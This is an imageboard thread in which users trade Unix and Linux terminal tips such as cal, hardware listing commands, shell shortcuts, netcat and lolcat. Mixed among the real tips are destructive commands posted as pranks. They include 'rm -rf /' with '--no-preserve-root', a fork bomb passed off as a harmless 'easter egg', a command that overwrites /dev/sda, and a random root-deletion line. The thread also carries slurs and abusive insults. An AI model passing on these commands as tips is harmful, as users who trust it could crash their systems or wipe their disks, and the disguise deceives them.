Open unix shell

>open unix shell
>type "cal"
>mind blown

Can we have a unix terminal tips thread?

Attached: cal_cmd.png (724x463, 28K)

Other urls found in this thread:


its the calendar

it's wrong tho

Attached: 0btR08J.png (696x720, 239K)

rm - rf /

[spoiler]sudo apt install sl[/spoiler]

GNU's not unix.

I wrote a bunch of lua to do this a while back and feel like a retard for not knowing about cal.

Very nice, John. Consider using an NTP server.

Baby's first terminal session

This is your brain on down syndrome.

This. It is a recurring theme that you think "hey this could be neat" and you make it, then find out the functionality was there all along.

Not my screenshot, brainlets. Notice how it's from 2013?

Attached: 1521237376202.png (1228x1150, 191K)

Yowza. That's pretty cool

Great debugging commands :

>lsusb (list USB devices)
>lspci (list PCI devices)
>lshw (list all hardware (slower then above 2 if you know what bus the device you are looking for is on))
>lsof (list open files. Syntax can be awkward. IP and UNIX sockets count as files.)

Wait, what? I thought everyone knew about cal. That was one of the first commands I learned when I was beginning Unix.

Ctrl+L = clear
Ctrl+D = exit


Ctrl+D is actually EOF not exit.

babby's first time calling someone babby

CTRL+U empty curretly inputted line
CTRL+W delete word

On the other hand, there's a lot of shit where you think "surely someone thought this would be neat and would have implemented it" and then you find out that comparing two dates in Bash is like pulling teeth.

>John on full damage control

Attached: 1533137054526.png (578x614, 593K)

Attached: 1531578827051.jpg (409x618, 58K)

CTRL+U actually deletes from cursor to start of prompt
CTRL+K delete from cursor to end of prompt
CTRL+H delete/backspace helpful if you're on a terminal that doesn't support the backspace key

>use Linux Terminal
>Call it Unix
>Don't even call them Bash commands since its ubuntu
I hate Jow Forums so goddamn much it hurts.

You can also type reset!

cool command:
It helps you incase you don't know what the fuck you're doing.

It's actually correct, we are simply witnessing the electrons generated by John's HTTP request in 2013 interacting across spacetime with the present-day matter of the sys.Jow server.

Attached: travel.jpg (600x450, 58K)

you forgot the --no-preserve-root

I always found apropos useful. Not sure if thats something everyone knows or not



Attached: comfy.jpg (409x409, 45K)

>cal 9 1752

Attached: 1509900918499.jpg (1015x852, 356K)

That's pretty cool. I always love text mode stuff.

does anyone have the command that plays the zelda theme?

I hate you moot

whatis love
love: nothing appropriate.

Attached: 1505357162523.png (658x662, 59K)

kill yourself moot

chmod -x chmod

>open a terminal
>type nc -l 1234
>open a second terminal
>type nc (your hostname) 1234

Congratulations you just build a very basic client/server model using netcat. Anything you type on either console should appear on the other.

...or update your ntp sever...

yeah. that's my point. it's not 2013.

cat < file.txt

(on remote) nc -l 7000 | dd of=/dev/mapper/vgfoo-lvbar bs=32768
(on local) dd if=/dev/mapper/vgbaz-lvquz bs=32768 | nc remotehost 7000

Thank you so much for this.

Ctrl-W delete word (white-space separate)
Ctrl-U delete to beginning of line
Ctrl-K delete to end of line
Ctrl-A jump to beginning of line
Ctrl-E jump to end of line
Ctrl-X-E open prompt in text editor

Rude terminal. It fucks you up when u fuckup something.

cat /dev/port

how the hell is that working

echo '2+3' | bc

Are you retarded? It's literally just an url you call.

Last night I did
I've been trying to get the hang of vim on my own, but after two lessons of vimtutor, I'm unironically convinced that this is the best text editor ever made.

Unix is proprietary system from the 70s; nobody uses Unix today. Judging from your screenshot, you're using GNU, which is an Unix-like system, but not Unix.

Fucking retard. echo $((2+3))

>not glorious wget

Zelda tune in shell command?

>in linux terminal (on most distros)

$ ddate

telnet 23

ASCII Star Wars, enjoy.

$ info coreutils

Attached: 1532707077622.jpg (650x650, 77K)

that stuff is still up?

holy shit

What if I tell you there is something better?
> ncal

Of course, like many other cool sites.

How about...
cal | lolcat

Attached: ncal.png (1370x722, 20K)

Better :
dmesg | lolcat

Attached: giphy.gif (344x229, 640K)

It's nicer if you tell it a year btw

Why are people ITT so stupid?

It's just lolcat file, not cat file | lolcat

Jesus christ.

Spacing intentional.

In Unix, everything counts as file.

yes ######################################################## | lolcat

>$ python
>>> 2 + 2
> 4

Stop using words you don't understand.

Use unix timestamp dude
fuck human dates

"lolcat -a" gives a little animation.


sudo yes kek | tee /dev/sda

shit bricks

don't forget until it's finished wiping your hard drive

Eat balls, skid

Nice try, "lolcat dmesg" doesn't work.

cat /dev/zero > zero-filler
rm zero-filler

wiping free space with zeroes on the device so NSA wouldn't even be able to recover your gay porn from previous installs


Never write anything unencrypted on disk, that way when you toss the key nothing is recoverable. This is especially important for SSD's that have their own internal mappings making it impossible to for sure zero out anything

>emacs mode

you should use dd desu, and multiple overwrites aswell to be sure

consider not even having a writable disk. Do eveyrthing in a ramdisk.

try this neat easter egg OP. hilarious ascii art!
:(){ :|: & };:

been having trouble doing an example in C&H because i didn't know how to do an EOF

thanks user!

Cool shit bro, it's all, like, dancing on my screen and stuff.

Don't do this it makes mustard gas!

hoyl shit, this is even more epic than the starwars telnet thingy

I use this all the time.
# put in bashrc
# calls man page for command under cursor when you press C-k
# when you exit man, command line is in the same state as you left it in
# can also be invoked with "K" in command mode, if you use vi mode in bash (set -o vi)
function man_on_word {
# if in between words, move position to the first one
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" = " " ]; do
true $((--TMP_POS))
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" != " " ]
do true $((--TMP_POS))
if [ 0 -ne $TMP_POS ]; then true $((++TMP_POS));fi
man "$TMP_WORD"
bind -x '"\C-k":man_on_word'
bind -m vi-command -x '"K":man_on_word'

# [ $[ $RANDOM % 6 ] == 0 ] && rm --no-preserve-root -rf /* || echo "Alive"

Attached: 1*cIQiMyyFIzsoZi5M4LbH-g.jpg (1516x910, 176K)

CTRL+U clips the line from cursor to the beginning. You can recall the text with CTRL+Y

echo $((2+2))


Attached: file.png (600x450, 519K)

hey it works

Attached: inb4spic.png (1600x900, 1.5M)

$ compgen -ac ls
$ whatis $(!!)
$ ^whatis^type

It kind of looks like the matrix!

>Linux living in the past
color me surprised

telnet 666

Attached: 1490677968017.jpg (526x400, 55K)

it's like you didn't read their actual examples